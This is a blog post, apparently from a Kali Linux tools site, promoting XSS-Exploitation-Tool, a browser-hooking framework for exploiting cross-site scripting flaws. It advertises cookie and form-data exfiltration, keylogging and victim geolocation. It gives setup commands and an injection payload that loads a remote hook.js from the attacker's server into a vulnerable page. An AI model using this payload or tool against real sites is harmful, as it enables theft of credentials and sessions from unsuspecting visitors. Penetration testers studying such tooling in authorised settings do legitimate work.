Kali Linux

XSS-Exploitation-Tool : A Penetration Testing Tool

XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.

Disclaimer:

This tool is only for educational purpose, do not use it against real environment

Features

  • Technical Data about victim browser
  • Geolocation of the victim
  • Snapshot of the hooked/visited page
  • Source code of the hooked/visited page
  • Exfiltrate input field data
  • Exfiltrate cookies
  • Keylogging
  • Display alert box
  • Redirect user

Installation

Tested on Debian 11

You may need Apache, Mysql database and PHP with modules:

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

Install Git and pull the XSS-Exploitation-Tool source code:

$ sudo apt-get install git

$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

Install composer, then install the application dependencies:

$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/

Init the database

$ sudo mysql

Creating a new user with specific rights:

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

Creating the database (will result in an empty page):

Visit the page http://server-ip/reset_database.php

Adapt the javascript hook file

The file hook.js is a hook. You need to replace the ip address in the first line with the XSS Exploitation Tool server ip address:

var address = "your server ip";

How it works

First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the Javascript hook file (see exploit.html at the root dir):

?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers:

Screenshots

Please consider following and supporting us to stay updated with the latest info

R K

Recent Posts

Starship : Revolutionizing Terminal Experiences Across Shells

Starship is a powerful, minimal, and highly customizable cross-shell prompt designed to enhance the terminal…

8 hours ago

Lemmy : A Decentralized Link Aggregator And Forum For The Fediverse

Lemmy is an innovative, open-source platform designed for link aggregation and discussion, providing a decentralized…

8 hours ago

Massive UX Improvements, Custom Disassemblers, And MSVC Support In ImHex v1.37.0

The latest release of ImHex v1.37.0 introduces a host of exciting features and improvements, enhancing…

10 hours ago

Ghauri : A Powerful SQL Injection Detection And Exploitation Tool

Ghauri is a cutting-edge, cross-platform tool designed to automate the detection and exploitation of SQL…

12 hours ago

Writing Tools : Revolutionizing The Art Of Writing

Writing tools have become indispensable for individuals looking to enhance their writing efficiency, accuracy, and…

12 hours ago

PatchWerk : A Tool For Cleaning NTDLL Syscall Stubs

PatchWerk is a proof-of-concept (PoC) tool designed to clean NTDLL syscall stubs by patching syscall…

1 day ago